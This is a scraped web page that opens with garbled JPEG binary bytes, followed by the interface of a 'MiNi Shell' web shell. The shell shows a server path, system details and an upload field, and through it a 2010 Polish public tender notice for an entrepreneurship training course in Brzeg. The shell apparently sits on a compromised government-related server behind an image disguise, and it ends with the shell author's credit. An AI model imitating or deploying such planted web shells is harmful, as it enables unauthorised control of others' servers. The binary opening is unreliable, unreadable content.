JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100125/21434-N-2010.html

<p class="kh_header"><b>Brzeg: Ogłoszenie o przetargu nieograniczonym
na usługę szkoleniową pn. ABC przedsiębiorczości, czy jak rozpocząć działalność gospodarczą</b><br>
<b>Numer ogłoszenia: 21434 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Brzegu , ul. Armii Krajowej 32, 49-300 Brzeg, woj. opolskie, tel. 077 4441390 do 2, faks 077 4441390 do 2.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.brzeg.sisco.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ogłoszenie o przetargu nieograniczonym
na usługę szkoleniową pn. ABC przedsiębiorczości, czy jak rozpocząć działalność gospodarczą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1Przedmiotem zamówienia jest przeprowadzenie szkolenia pn. ABC przedsiębiorczości, czyli jak rozpocząć działalność gospodarczą. Szkoleniem objętych zostanie do 300 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Brzegu. 

Miejsce prowadzenia zajęć teoretycznych i praktycznych: Miasto Brzeg.

Przewidywana liczba godzin szkolenia - co najmniej 30 godzin dydaktycznych zegarowych,  w tym co najmniej 20 godzin zajęć praktycznych.
 
Szkolenie winno być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu. Zajęcia powinny odbywać się w dni robocze od poniedziałku do piątku w godzinach od 8:00 do 15:00. Dzienna liczba  godzin max. 7 godzin zegarowych. 

Termin realizacji  od   do 30 listopada 2010r. w grupach  po 15 osób. Szkolenie rozpoczynać się  będzie od    - w poniedziałki.

Na każde szkolenie powinna być wydana dla osoby skierowanej na szkolenie karta  prowadzonych zajęć. Karta ta winna być każdorazowo wypełniana, po przeprowadzeniu zajęć zgodnie z programem szkolenia. Szkolenia zlecane będą wykonawcy, po podpisaniu umowy w miarę potrzeb zamawiającego, tj. w przypadku, gdy osoba bezrobotna lub inna uprawniona osoba skierowana przez zamawiającego na szkole nie, będzie przygotowana do prowadzenia  działalności gospodarczej.

Wykonawca będzie przyjmował grupy osób kierowane przez Zamawiającego na szkolenie na bieżąco lub w warunkach niskiej częstotliwości rozpoczynania szkoleń - co najmniej jeden raz w miesiącu. Każda grupa osób szkolonych będzie oddzielnie rozliczana  w  ramach pod umów głównej umowy.

Każdy uczestnik szkolenia winien poznać zasady rozpoczęcia i prowadzenia
działalności gospodarczej, zasady rozliczania z urzędem skarbowym i zakładem ubezpieczeń społecznych oraz umieć samodzielnie sporządzić biznesplan. 

Celem szkolenia jest przygotowanie uczestników szkolenia do prowadzenia własnej działalności gospodarczej, poznanie zasad opracowywania biznesplanu, poznanie zasad prowadzenia księgowości i finansów, poznanie zagadnień dotyczących rozliczeń podatków potrzebnymi w firmie, poznanie zasad prawa pracy, zasad sporządzania kalkulacji, ochrony prawnej konkurencji i konsumentów, umów cywilno-prawnych, występowania o dotacje z Unii Europejskiej.
Zajęcia winny być prowadzone z wykorzystaniem komputera i internetu.

Uczestnicy szkolenia winni otrzymać Zaświadczenia o ukończeniu kursu zgodnie z § 6 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. z 2006r. Nr 31, poz. 216).

Wykonawca winien zapewnić: skrypty, materiały dotyczące szkolenia dla każdego 
     	uczestnika .

Wykonawca winien zapewnić dla zamiejscowych uczestników szkolenia zimne i gorące napoje oraz poczęstunek (kanapki).

Zamawiający nie dopuszcza zlecenia realizacji zamówienia w całości lub części
	podwykonawcom.

Wykonawca osobom skierowanym na szkolenie przez starostę, z wyjątkiem osób posiadających z tego tytułu prawo do stypendium, przysługuje odszkodowanie 
z tytułu ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem, wypłacane przez instytucję ubezpieczeniową, w której osoby te zostały ubezpieczone - zgodnie z art. 41 ust. 7 ustawy o promocji zatrudnienia i instytucjach rynku pracy.

Wykonawca winien zapewnić odpowiednie warunki lokalowe. Zajęcia teoretyczne powinny być prowadzone w salach dydaktycznych wyposażonych w odpowiednie oprzyrządowanie techniczne, w tym aparaturę audiowizualną, kserokopiarkę, rzutnik pisma, tablicę naścienną lub informacyjną, biurka, krzesła. Wykonawca winien umożliwić swobodne uczestnictwo każdego kursanta w zajęciach praktyczno - dydaktycznych.

Wymagania dotyczące kadry:

Zajęcia teoretyczne winny być prowadzone przez osoby z wykształceniem wyższym magisterskim, z uprawnieniami pedagogicznymi do wykładów przedmiotów zawodowych.
Zajęcia praktyczne winny być prowadzone przez osoby z uprawnieniami 	pedagogicznymi, specjalistami dziedziny min: ekonomii, finansów, prawa, 	pozyskiwania  funduszy unijnych na działalność gospodarczą.
	Zajęcia praktyczne w ramach grupy winny być prowadzone przez dwóch 	instruktorów .

Program szkolenia winien być zgodny z § 5 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby    dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. z 2006r. Nr 31, poz. 216).

Program nauczania każdej formy winien zawierać:

nazwę formy kształcenia;
czas trwania i sposób jej organizacji;
wymagania wstępne dla uczestników;
cele kształcenia;
plan nauczania określający nazwę zajęć edukacyjnych oraz jej wymiar;
treści kształcenia w zakresie poszczególnych zajęć edukacyjnych;
wykaz literatury oraz niezbędnych środków i zajęć dydaktycznych;
sposób sprawdzania efektów kształcenia.

Program szkolenia powinien zawierać ponadto harmonogram zajęć 	w poszczególnych dniach i tygodniach szkolenia, z wyszczególnieniem dokładnych 	godzin dydaktycznych.

Wykonawca  winien stosownie z zapisami ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy, w szczególności z art. 20. ust. 1, przedstawić aktualny wpis do rejestru instytucji szkoleniowych prowadzonych przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu:

O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią warunki wymienione w art. 22 ust. 1 ustawy, dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
2)	posiadania wiedzy i doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 	
4)	sytuacji ekonomicznej i finansowej.

Ocena spełnienia warunków w postępowaniu o zamówienie publiczne

Z postępowania o udzielenie zamówienia publicznego wyklucza się wykonawców na podstawie art. 24 ust.1 i 2 ustawy. 

Ponadto Zamawiający odrzuca ofertę, która:
1)	jest niezgodna z ustawą; 
2)	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3; 
3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji; 
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia; 
5)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert; 
6)	zawiera błędy w obliczeniu ceny; 
7)	Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3; 
8)	jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	wypełniony formularz oferty (wg załączonego wzoru);
2.	oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy (wg 	wzoru określonego w załączniku nr 1 do oferty);
3.	oświadczenie o niepodleganiu z wykluczenia na podstawie  art. 24 ust. 1 i 2 	ustawy (wg wzoru określonego w załączniku nr 2  do oferty);
4.	szczegółową kalkulację kosztów szkolenia 1 osoby - preliminarz kosztów (wg 	wzoru określonego w załączniku nr 3 do oferty); 
5.	szczegółowy program szkolenia zgodny z § 5 rozporządzenia Ministra Edukacji 	i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez oso	by 	dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach 	pozaszkolnych (Dz. U. z 2006r. Nr 31, poz. 216). 
6.	wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą 	uczestniczyć w wykonywaniu zamówienia (wg wzoru określonego w załączniku 	nr 4 do oferty).
	Wymagane jest załączenie aktualnych dokumentów poświadczających po	siadanie uprawnień, kwalifikacji w zakresie realizacji przedmiotu zamówienia;
7.	wykaz niezbędnych do wykonywania zamówienia narzędzi i urządzeń, jakimi 	dysponuje Wykonawca (wg wzoru określonego w załączniku nr 5 do oferty);
8.	opis warunków do odbywania zajęć teoretycznych i praktycznych (opis sal, 	ilość stanowisk oraz ich dokładny opis i wyposażenie),
9.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 	ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 	do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione 	nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
10.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz 	właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego 	Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie 	zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 	i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, 	odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 	wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 	miesiące przed upływem terminu składania wniosków o dopuszczenie do 	udziału w 	postępowaniu o udzielenie zamówienia albo składania ofert,
11.	aktualne zaświadczenie o wpisie do rejestru instytucji szkoleniowych wydane 	przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji 	szkoleniowej; 
12.	wykaz wykonanych lub wykonywanych w okresie ostatnich 3 lat usług 	szkoleniowych z zakresu ABC przedsiębiorczości, czyli jak rozpocząć 	działalność gospodarczą, a jeżeli okres prowadzenia 	działalności jest 	krótszy, to w okresie jej prowadzenia o  wartości podobnej do 	obecnego 	zamówienia, z podaniem liczby 	przeszkolonych osób, przedmiotu, 	okresu realizacji oraz załączenia dokumentów potwierdzających, że 	usługi te zostały wykonane należycie (zawierających dokładną liczbę 	przeszkolonych osób) - załącznik nr 7 do oferty,
13.	zatwierdzoną przez Wykonawcę umowę - załącznik nr 6 do oferty,
14.	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia 	wymagane załączenie pełnomocnictwa;
15.	pełnomocnictwo - w przypadku gdy wykonawcę reprezentuje pełnomocnik, po	siadające zakres i podpisane przez osoby reprezentujące wykonawcę;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Warunki lokalowe i sprzęt jakim dysponuje Wykonawca - 35</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 15</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pup.brzeg.sisco.info.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urzędz Pracy w Brzegu przy ul. Armii Krajowej 32, pokój nr 29..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2010 godzina 10:00, miejsce: Powiatowy Urzędz Pracy w Brzegu przy ul. Armii Krajowej 32, pokój nr 16 (sekretariat 1 piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com